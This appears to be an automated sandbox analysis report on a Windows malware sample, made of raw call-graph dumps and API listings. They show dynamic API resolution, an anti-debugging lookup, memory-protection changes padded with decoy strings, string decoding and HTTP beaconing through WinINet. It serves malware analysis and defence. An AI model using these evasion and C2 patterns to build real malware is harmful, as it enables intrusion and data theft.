4daa50 lstrcpy 37312->37350 37313 4d5510 25 API calls 37313->37350 37314 4d5440 20 API calls 37314->37350 37315 4d5893 StrCmpCA 37315->37350 37316 4d58f0 StrCmpCA 37317 4d5a2c 37316->37317 37316->37350 37318 4dabb0 lstrcpy 37317->37318 37319 4d5a38 37318->37319 37320 4dab30 2 API calls 37319->37320 37322 4d5a46 37320->37322 37321 4d5aa6 StrCmpCA 37323 4d5be1 37321->37323 37321->37350 37324 4dab30 2 API calls 37322->37324 37325 4dabb0 lstrcpy 
37323->37325 37326 4d5a55 37324->37326 37328 4d5bed 37325->37328 37327 4c16b0 lstrcpy 37326->37327 37349 4d5a61 37327->37349 37330 4dab30 2 API calls 37328->37330 37329 4dab30 lstrlen lstrcpy 37329->37350 37332 4d5bfb 37330->37332 37331 4d5c5b StrCmpCA 37333 4d5c78 37331->37333 37334 4d5c66 Sleep 37331->37334 37336 4dab30 2 API calls 37332->37336 37338 4dabb0 lstrcpy 37333->37338 37334->37350 37335 4daab0 lstrcpy 37335->37350 37337 4d5c0a 37336->37337 37339 4c16b0 lstrcpy 37337->37339 37340 4d5c84 37338->37340 37339->37349 37341 4dab30 2 API calls 37340->37341 37342 4d5c93 37341->37342 37343 4dab30 2 API calls 37342->37343 37344 4d5ca2 37343->37344 37346 4c16b0 lstrcpy 37344->37346 37345 4d59da StrCmpCA 37345->37350 37346->37349 37347 4d5b8f StrCmpCA 37347->37350 37348 4c1590 lstrcpy 37348->37350 37349->36404 37350->37312 37350->37313 37350->37314 37350->37315 37350->37316 37350->37321 37350->37329 37350->37331 37350->37335 37350->37345 37350->37347 37350->37348 37351 4dabb0 lstrcpy 37350->37351 37351->37350 37353 4d76dc 37352->37353 37354 4d76e3 GetVolumeInformationA 37352->37354 37353->37354 37355 4d7721 37354->37355 37356 4d778c GetProcessHeap RtlAllocateHeap 37355->37356 37357 4d77a9 37356->37357 37358 4d77b8 wsprintfA 37356->37358 37359 4daa50 lstrcpy 37357->37359 37360 4daa50 lstrcpy 37358->37360 37361 4d5ff7 37359->37361 37360->37361 37361->36425 37363 4daab0 lstrcpy 37362->37363 37364 4c48e9 37363->37364 37565 4c4800 37364->37565 37366 4c48f5 37367 4daa50 lstrcpy 37366->37367 37368 4c4927 37367->37368 37369 4daa50 lstrcpy 37368->37369 37370 4c4934 37369->37370 37371 4daa50 lstrcpy 37370->37371 37372 4c4941 37371->37372 37373 4daa50 lstrcpy 37372->37373 37374 4c494e 37373->37374 37375 4daa50 lstrcpy 37374->37375 37376 4c495b InternetOpenA StrCmpCA 37375->37376 37377 4c4994 37376->37377 37378 4c4f1b InternetCloseHandle 37377->37378 37571 4d8cf0 37377->37571 37380 4c4f38 37378->37380 37586 4ca210 CryptStringToBinaryA 37380->37586 37381 4c49b3 37579 4dac30 
37381->37579 37384 4c49c6 37386 4dabb0 lstrcpy 37384->37386 37391 4c49cf 37386->37391 37387 4dab30 2 API calls 37388 4c4f55 37387->37388 37390 4dacc0 4 API calls 37388->37390 37389 4c4f77 ctype 37393 4daab0 lstrcpy 37389->37393 37392 4c4f6b 37390->37392 37395 4dacc0 4 API calls 37391->37395 37394 4dabb0 lstrcpy 37392->37394 37406 4c4fa7 37393->37406 37394->37389 37396 4c49f9 37395->37396 37397 4dabb0 lstrcpy 37396->37397 37398 4c4a02 37397->37398 37399 4dacc0 4 API calls 37398->37399 37400 4c4a21 37399->37400 37401 4dabb0 lstrcpy 37400->37401 37402 4c4a2a 37401->37402 37403 4dac30 3 API calls 37402->37403 37404 4c4a48 37403->37404 37405 4dabb0 lstrcpy 37404->37405 37407 4c4a51 37405->37407 37406->36428 37408 4dacc0 4 API calls 37407->37408 37409 4c4a70 37408->37409 37410 4dabb0 lstrcpy 37409->37410 37411 4c4a79 37410->37411 37412 4dacc0 4 API calls 37411->37412 37413 4c4a98 37412->37413 37414 4dabb0 lstrcpy 37413->37414 37415 4c4aa1 37414->37415 37416 4dacc0 4 API calls 37415->37416 37417 4c4acd 37416->37417 37418 4dac30 3 API calls 37417->37418 37419 4c4ad4 37418->37419 37420 4dabb0 lstrcpy 37419->37420 37421 4c4add 37420->37421 37422 4c4af3 InternetConnectA 37421->37422 37422->37378 37423 4c4b23 HttpOpenRequestA 37422->37423 37425 4c4f0e InternetCloseHandle 37423->37425 37426 4c4b78 37423->37426 37425->37378 37427 4dacc0 4 API calls 37426->37427 37428 4c4b8c 37427->37428 37429 4dabb0 lstrcpy 37428->37429 37430 4c4b95 37429->37430 37431 4dac30 3 API calls 37430->37431 37432 4c4bb3 37431->37432 37433 4dabb0 lstrcpy 37432->37433 37434 4c4bbc 37433->37434 37435 4dacc0 4 API calls 37434->37435 37436 4c4bdb 37435->37436 37437 4dabb0 lstrcpy 37436->37437 37438 4c4be4 37437->37438 37439 4dacc0 4 API calls 37438->37439 37440 4c4c05 37439->37440 37441 4dabb0 lstrcpy 37440->37441 37442 4c4c0e 37441->37442 37443 4dacc0 4 API calls 37442->37443 37444 4c4c2e 37443->37444 37445 4dabb0 lstrcpy 37444->37445 37446 4c4c37 37445->37446 37447 4dacc0 4 API calls 37446->37447 37448 
4c4c56 37447->37448 37449 4dabb0 lstrcpy 37448->37449 37450 4c4c5f 37449->37450 37451 4dac30 3 API calls 37450->37451 37452 4c4c7d 37451->37452 37453 4dabb0 lstrcpy 37452->37453 37454 4c4c86 37453->37454 37455 4dacc0 4 API calls 37454->37455 37456 4c4ca5 37455->37456 37457 4dabb0 lstrcpy 37456->37457 37458 4c4cae 37457->37458 37459 4dacc0 4 API calls 37458->37459 37460 4c4ccd 37459->37460 37461 4dabb0 lstrcpy 37460->37461 37462 4c4cd6 37461->37462 37463 4dac30 3 API calls 37462->37463 37464 4c4cf4 37463->37464 37465 4dabb0 lstrcpy 37464->37465 37466 4c4cfd 37465->37466 37467 4dacc0 4 API calls 37466->37467 37468 4c4d1c 37467->37468 37469 4dabb0 lstrcpy 37468->37469 37470 4c4d25 37469->37470 37471 4dacc0 4 API calls 37470->37471 37472 4c4d46 37471->37472 37473 4dabb0 lstrcpy 37472->37473 37474 4c4d4f 37473->37474 37475 4dacc0 4 API calls 37474->37475 37476 4c4d6f 37475->37476 37477 4dabb0 lstrcpy 37476->37477 37478 4c4d78 37477->37478 37479 4dacc0 4 API calls 37478->37479 37480 4c4d97 37479->37480 37481 4dabb0 lstrcpy 37480->37481 37482 4c4da0 37481->37482 37483 4dac30 3 API calls 37482->37483 37484 4c4dbe 37483->37484 37485 4dabb0 lstrcpy 37484->37485 37486 4c4dc7 37485->37486 37487 4daa50 lstrcpy 37486->37487 37488 4c4de2 37487->37488 37489 4dac30 3 API calls 37488->37489 37490 4c4e03 37489->37490 37491 4dac30 3 API calls 37490->37491 37492 4c4e0a 37491->37492 37493 4dabb0 lstrcpy 37492->37493 37494 4c4e16 37493->37494 37495 4c4e37 lstrlen 37494->37495 37496 4c4e4a 37495->37496 37497 4c4e53 lstrlen 37496->37497 37585 4dade0 37497->37585 37499 4c4e63 HttpSendRequestA 37500 4c4e82 InternetReadFile 37499->37500 37501 4c4eb7 InternetCloseHandle 37500->37501 37506 4c4eae 37500->37506 37503 4dab10 37501->37503 37503->37425 37504 4dacc0 4 API calls 37504->37506 37505 4dabb0 lstrcpy 37505->37506 37506->37500 37506->37501 37506->37504 37506->37505 37592 4dade0 37507->37592 37509 4d1a14 StrCmpCA 37510 4d1a1f ExitProcess 37509->37510 37511 4d1a27 37509->37511 37512 4d1c12 
37511->37512 37513 4d1aad StrCmpCA 37511->37513 37514 4d1acf StrCmpCA 37511->37514 37515 4d1b41 StrCmpCA 37511->37515 37516 4d1ba1 StrCmpCA 37511->37516 37517 4d1bc0 StrCmpCA 37511->37517 37518 4d1b63 StrCmpCA 37511->37518 37519 4d1b82 StrCmpCA 37511->37519 37520 4d1afd StrCmpCA 37511->37520 37521 4d1b1f StrCmpCA 37511->37521 37522 4dab30 lstrlen lstrcpy 37511->37522 37512->36430 37513->37511 37514->37511 37515->37511 37516->37511 37517->37511 37518->37511 37519->37511 37520->37511 37521->37511 37522->37511 37523->36436 37524->36438 37525->36444 37526->36446 37527->36452 37528->36454 37529->36458 37530->36462 37531->36466 37532->36472 37533->36474 37534->36478 37535->36492 37536->36496 37537->36495 37538->36491 37539->36495 37540->36513 37541->36498 37542->36500 37543->36504 37544->36509 37545->36510 37546->36517 37547->36520 37548->36526 37549->36548 37550->36553 37551->36552 37552->36549 37553->36552 37554->36562 37557 4daab0 lstrcpy 37556->37557 37558 4c16c3 37557->37558 37559 4daab0 lstrcpy 37558->37559 37560 4c16d5 37559->37560 37561 4daab0 lstrcpy 37560->37561 37562 4c16e7 37561->37562 37563 4daab0 lstrcpy 37562->37563 37564 4c15a3 37563->37564 37564->37289 37566 4c4816 37565->37566 37567 4c4888 lstrlen 37566->37567 37591 4dade0 37567->37591 37569 4c4898 InternetCrackUrlA 37570 4c48b7 37569->37570 37570->37366 37572 4daa50 lstrcpy 37571->37572 37573 4d8d04 37572->37573 37574 4daa50 lstrcpy 37573->37574 37575 4d8d12 GetSystemTime 37574->37575 37576 4d8d29 37575->37576 37577 4daab0 lstrcpy 37576->37577 37578 4d8d8c 37577->37578 37578->37381 37580 4dac41 37579->37580 37581 4dac98 37580->37581 37583 4dac78 lstrcpy lstrcat 37580->37583 37582 4daab0 lstrcpy 37581->37582 37584 4daca4 37582->37584 37583->37581 37584->37384 37585->37499 37587 4ca249 LocalAlloc 37586->37587 37588 4c4f3e 37586->37588 37587->37588 37589 4ca264 CryptStringToBinaryA 37587->37589 37588->37387 37588->37389 37589->37588 37590 4ca289 LocalFree 37589->37590 37590->37588 37591->37569 37592->37509

                              Control-flow Graph

                              control_flow_graph 660 4d9bb0-4d9bc4 call 4d9aa0 663 4d9bca-4d9dde call 4d9ad0 GetProcAddress * 21 660->663 664 4d9de3-4d9e42 LoadLibraryA * 5 660->664 663->664 665 4d9e5d-4d9e64 664->665 666 4d9e44-4d9e58 GetProcAddress 664->666 669 4d9e96-4d9e9d 665->669 670 4d9e66-4d9e91 GetProcAddress * 2 665->670 666->665 671 4d9e9f-4d9eb3 GetProcAddress 669->671 672 4d9eb8-4d9ebf 669->672 670->669 671->672 673 4d9ed9-4d9ee0 672->673 674 4d9ec1-4d9ed4 GetProcAddress 672->674 675 4d9f11-4d9f12 673->675 676 4d9ee2-4d9f0c GetProcAddress * 2 673->676 674->673 676->675
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,012A24D0), ref: 004D9BF1
                              • GetProcAddress.KERNEL32(74DD0000,012A24E8), ref: 004D9C0A
                              • GetProcAddress.KERNEL32(74DD0000,012A2248), ref: 004D9C22
                              • GetProcAddress.KERNEL32(74DD0000,012A2350), ref: 004D9C3A
                              • GetProcAddress.KERNEL32(74DD0000,012A2230), ref: 004D9C53
                              • GetProcAddress.KERNEL32(74DD0000,012A9158), ref: 004D9C6B
                              • GetProcAddress.KERNEL32(74DD0000,01295DB0), ref: 004D9C83
                              • GetProcAddress.KERNEL32(74DD0000,01295B10), ref: 004D9C9C
                              • GetProcAddress.KERNEL32(74DD0000,012A22F0), ref: 004D9CB4
                              • GetProcAddress.KERNEL32(74DD0000,012A23C8), ref: 004D9CCC
                              • GetProcAddress.KERNEL32(74DD0000,012A2338), ref: 004D9CE5
                              • GetProcAddress.KERNEL32(74DD0000,012A2380), ref: 004D9CFD
                              • GetProcAddress.KERNEL32(74DD0000,01295B30), ref: 004D9D15
                              • GetProcAddress.KERNEL32(74DD0000,012A23E0), ref: 004D9D2E
                              • GetProcAddress.KERNEL32(74DD0000,012A23F8), ref: 004D9D46
                              • GetProcAddress.KERNEL32(74DD0000,01295E10), ref: 004D9D5E
                              • GetProcAddress.KERNEL32(74DD0000,012A2428), ref: 004D9D77
                              • GetProcAddress.KERNEL32(74DD0000,012A2440), ref: 004D9D8F
                              • GetProcAddress.KERNEL32(74DD0000,01295C10), ref: 004D9DA7
                              • GetProcAddress.KERNEL32(74DD0000,012A2470), ref: 004D9DC0
                              • GetProcAddress.KERNEL32(74DD0000,01295CF0), ref: 004D9DD8
                              • LoadLibraryA.KERNEL32(012A2548,?,004D6CA0), ref: 004D9DEA
                              • LoadLibraryA.KERNEL32(012A25D8,?,004D6CA0), ref: 004D9DFB
                              • LoadLibraryA.KERNEL32(012A2578,?,004D6CA0), ref: 004D9E0D
                              • LoadLibraryA.KERNEL32(012A2560,?,004D6CA0), ref: 004D9E1F
                              • LoadLibraryA.KERNEL32(012A2590,?,004D6CA0), ref: 004D9E30
                              • GetProcAddress.KERNEL32(75A70000,012A25A8), ref: 004D9E52
                              • GetProcAddress.KERNEL32(75290000,012A25C0), ref: 004D9E73
                              • GetProcAddress.KERNEL32(75290000,012A2530), ref: 004D9E8B
                              • GetProcAddress.KERNEL32(75BD0000,012A2518), ref: 004D9EAD
                              • GetProcAddress.KERNEL32(75450000,01295AB0), ref: 004D9ECE
                              • GetProcAddress.KERNEL32(76E90000,012A91A8), ref: 004D9EEF
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004D9F06
                              Strings
                              • NtQueryInformationProcess, xrefs: 004D9EFA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 2f9dd76fbf84725f7764a139c23be03009d263c95cb7f1bf37cf72c55a91a457
                              • Instruction ID: 035b2d785418aa4f0086af906a05349ae5a4022510adf4e7350344c19a1a1c56
                              • Opcode Fuzzy Hash: 2f9dd76fbf84725f7764a139c23be03009d263c95cb7f1bf37cf72c55a91a457
                              • Instruction Fuzzy Hash: 1EA10DB55782049FC348DFA9EC9895677B9BB8E701710C61BB909C3274D73CA942CB6C

                              Control-flow Graph

                              control_flow_graph 764 4c4610-4c46e5 RtlAllocateHeap 781 4c46f0-4c46f6 764->781 782 4c46fc-4c479a 781->782 783 4c479f-4c47f9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C465E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004C47EC
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C476E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C47CB
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4728
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46C8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4784
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46D3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C47B5
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46BD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C479F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46B2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C47C0
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4707
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4672
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4763
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C478F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4688
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C467D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4779
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4667
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46FC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4693
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C47AA
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4712
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C471D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46A7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: b95ebcbfb6a1d3d8ffdd3889c6232ea384af699446ebf7d1a3fc8eb74dfb38f3
                              • Instruction ID: 48026909ca6dd5b4a094c3ab3831c59f9a8599a3040a6862c330c0ca34bb7ac6
                              • Opcode Fuzzy Hash: b95ebcbfb6a1d3d8ffdd3889c6232ea384af699446ebf7d1a3fc8eb74dfb38f3
                              • Instruction Fuzzy Hash: 544144A07C27846EC624B7F5A87DFFD76625F5271FF607846AE8032382CB7C9508452A

                              Control-flow Graph

                              control_flow_graph 1033 4c62d0-4c635b call 4daab0 call 4c4800 call 4daa50 InternetOpenA StrCmpCA 1040 4c635d 1033->1040 1041 4c6364-4c6368 1033->1041 1040->1041 1042 4c636e-4c6392 InternetConnectA 1041->1042 1043 4c6559-4c6575 call 4daab0 call 4dab10 * 2 1041->1043 1045 4c654f-4c6553 InternetCloseHandle 1042->1045 1046 4c6398-4c639c 1042->1046 1062 4c6578-4c657d 1043->1062 1045->1043 1048 4c639e-4c63a8 1046->1048 1049 4c63aa 1046->1049 1051 4c63b4-4c63e2 HttpOpenRequestA 1048->1051 1049->1051 1052 4c63e8-4c63ec 1051->1052 1053 4c6545-4c6549 InternetCloseHandle 1051->1053 1055 4c63ee-4c640f InternetSetOptionA 1052->1055 1056 4c6415-4c6455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 4c647c-4c649b call 4d8ad0 1056->1058 1059 4c6457-4c6477 call 4daa50 call 4dab10 * 2 1056->1059 1067 4c649d-4c64a4 1058->1067 1068 4c6519-4c6539 call 4daa50 call 4dab10 * 2 1058->1068 1059->1062 1071 4c64a6-4c64d0 InternetReadFile 1067->1071 1072 4c6517-4c653f InternetCloseHandle 1067->1072 1068->1062 1076 4c64db 1071->1076 1077 4c64d2-4c64d9 1071->1077 1072->1053 1076->1072 1077->1076 1078 4c64dd-4c6515 call 4dacc0 call 4dabb0 call 4dab10 1077->1078 1078->1071
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                                • Part of subcall function 004C4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • InternetOpenA.WININET(004E0DFF,00000001,00000000,00000000,00000000), ref: 004C6331
                              • StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C6353
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C6385
                              • HttpOpenRequestA.WININET(00000000,GET,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C63D5
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004C640F
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C6421
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004C644D
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004C64BD
                              • InternetCloseHandle.WININET(00000000), ref: 004C653F
                              • InternetCloseHandle.WININET(00000000), ref: 004C6549
                              • InternetCloseHandle.WININET(00000000), ref: 004C6553
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
